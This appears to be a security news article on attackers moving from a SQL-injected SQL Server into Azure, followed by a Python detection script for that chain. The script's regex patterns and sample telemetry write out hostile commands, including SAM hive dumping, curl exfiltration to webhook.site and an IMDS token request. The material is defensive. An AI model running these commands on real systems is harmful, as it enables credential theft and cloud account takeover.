Hackers have been observed trying to breach cloud environments through Microsoft SQL Server instances compromised via SQL injection.
Microsoft’s security researchers report that this lateral movement technique has been previously seen in attacks on other services like VMs and Kubernetes clusters.
However, this is the first time they have seen SQL Servers leveraged for this purpose.
Attack chain
The attacks Microsoft observed start with the exploitation of an SQL injection vulnerability in an application in the target’s environment.
This gives the threat actors access to the SQL Server instance hosted on an Azure Virtual Machine with elevated permissions to execute SQL commands and extract valuable data.
This includes data on databases, table names, schemas, database versions, network configuration, and read/write/delete permissions.
If the compromised application has elevated permissions, the attackers may enable the ‘xp_cmdshell’ stored procedure to run operating system (OS) commands via SQL, giving them a shell on the host.
The commands executed by the attackers at this stage include the following:
- Read directories, list processes, and check network shares.
- Download encoded and compressed executables and PowerShell scripts.
- Set up a scheduled task to launch a backdoor script.
- Retrieve user credentials by dumping SAM and SECURITY registry keys.
- Exfiltrate data using a unique method that involves the ‘webhook.site’ free service, which facilitates HTTP request and email inspection and debugging.
Using a legitimate service for data exfiltration makes the activity less likely to appear suspicious or raise flags in security products, allowing the attackers to discreetly steal data from the host.
Next, the attackers attempted to exploit the cloud identity of the SQL Server instance to access the IMDS (Instance Metadata Service) and obtain the cloud identity’s access token.
In Azure, resources are often assigned managed identities for authentication with other cloud resources and services. If the attackers hold that token, they can use it to access any cloud resource the identity has permissions to.
Microsoft says the attackers failed to successfully leverage this technique due to errors, but the approach remains valid and constitutes a dire threat to organizations.
Finally, the threat actors deleted any downloaded scripts and wiped temporary database modifications to erase traces of the attack.
Defending tips
Microsoft suggests using Defender for Cloud and Defender for Endpoint to catch SQL injections and suspicious SQLCMD activity, both employed in the observed attack.
To mitigate the threat, Microsoft recommends applying the principle of least privilege when granting user permissions, which always adds friction to lateral movement attempts.
Hunting queries for Microsoft 365 Defender and Sentinel are provided in the appendix of Microsoft’s report.
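The chain described above, from enabling xp_cmdshell through the IMDS token request, can be expressed as correlated detection logic over SQL statement telemetry, which is the kind of hunting the report’s appendix queries perform. The following Python is an added example, not code from Microsoft’s report and not its hunting queries: the record fields (‘host’, ‘login’, ‘statement’), the regex indicators, the constructed sample telemetry and the three-stage alert threshold are all assumptions made for this illustration.

```python
"""Added example: map the reported SQL Server attack chain onto detection
logic run over SQL statement telemetry.

Assumptions (not from the report): each record is a dict with the fields
'host', 'login' and 'statement'; the statement text is what a SQL Server
audit or Extended Events session would capture, so OS commands passed to
xp_cmdshell appear inside it. The regexes are constructed for this example
and are not Microsoft's hunting queries.
"""
import re
from collections import defaultdict

# One indicator per stage of the observed chain. Enabling xp_cmdshell and
# executing it are kept as separate signals on purpose.
STAGES = {
    "enable_xp_cmdshell": re.compile(
        r"sp_configure\s+N?'?xp_cmdshell'?\s*,\s*1\b", re.I),
    "run_xp_cmdshell": re.compile(
        r"\bexec(ute)?\s+(master\.\.|master\.dbo\.)?xp_cmdshell\b", re.I),
    "encoded_powershell": re.compile(
        r"powershell(\.exe)?\s.*-(e|enc|encodedcommand)\b", re.I),
    "scheduled_task": re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I),
    "registry_hive_dump": re.compile(
        r"\breg(\.exe)?\s+save\b.*\\(sam|security)\b", re.I),
    "webhook_exfil": re.compile(r"\bwebhook\.site\b", re.I),
    "imds_token_request": re.compile(
        r"169\.254\.169\.254/metadata/identity", re.I),
}

# Constructed telemetry: one routine DBA session and one session that walks
# the reported chain. Hosts, logins, paths and IDs are placeholders.
SAMPLE_EVENTS = [
    {"host": "sql-prod-01", "login": "dba_alice",
     "statement": "SELECT name FROM sys.databases"},
    {"host": "sql-prod-01", "login": "dba_alice",
     "statement": "EXEC xp_cmdshell 'dir D:\\Backups'"},
    {"host": "sql-web-02", "login": "webapp_svc",
     "statement": "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"},
    {"host": "sql-web-02", "login": "webapp_svc",
     "statement": "EXEC xp_cmdshell 'dir C:\\ & tasklist & net view'"},
    {"host": "sql-web-02", "login": "webapp_svc",
     "statement": "EXEC xp_cmdshell 'powershell.exe -enc PLACEHOLDER'"},
    {"host": "sql-web-02", "login": "webapp_svc",
     "statement": "EXEC xp_cmdshell 'schtasks /create /tn Updater "
                  "/tr C:\\ProgramData\\task.ps1'"},
    {"host": "sql-web-02", "login": "webapp_svc",
     "statement": "EXEC xp_cmdshell 'reg save HKLM\\SAM C:\\ProgramData\\s.hiv'"},
    {"host": "sql-web-02", "login": "webapp_svc",
     "statement": "EXEC xp_cmdshell 'curl -d @C:\\ProgramData\\out.txt "
                  "https://webhook.site/PLACEHOLDER-ID'"},
    {"host": "sql-web-02", "login": "webapp_svc",
     "statement": "EXEC xp_cmdshell 'curl -H Metadata:true "
                  "http://169.254.169.254/metadata/identity/oauth2/token'"},
]


def classify(statement):
    """Return the set of stage names whose indicator fires on one statement."""
    return {name for name, pattern in STAGES.items() if pattern.search(statement)}


def hunt(events, min_stages=3):
    """Correlate stage hits per (host, login) and return the sessions to alert on.

    A lone xp_cmdshell call is routine noise on many estates, so a session is
    reported only once it reaches min_stages distinct stages, or as soon as it
    touches the IMDS identity endpoint, which is rarely legitimate from a SQL
    login and is the step that turns a database compromise into a cloud one.
    """
    hits = defaultdict(set)
    for event in events:
        hits[(event["host"], event["login"])] |= classify(event["statement"])
    findings = []
    for (host, login), stages in sorted(hits.items()):
        if len(stages) >= min_stages or "imds_token_request" in stages:
            findings.append({"host": host, "login": login,
                             "stages": sorted(stages)})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"{finding['host']} / {finding['login']}: "
              f"{', '.join(finding['stages'])}")
```

Run against the constructed sample, the DBA session on sql-prod-01 never crosses the threshold, while the webapp_svc session on sql-web-02 is reported with all seven stages. In production the per-session grouping would key on the SQL session or client address rather than login alone, and the IMDS indicator is better sourced from the VM’s network or endpoint telemetry, since the request does not have to go through xp_cmdshell.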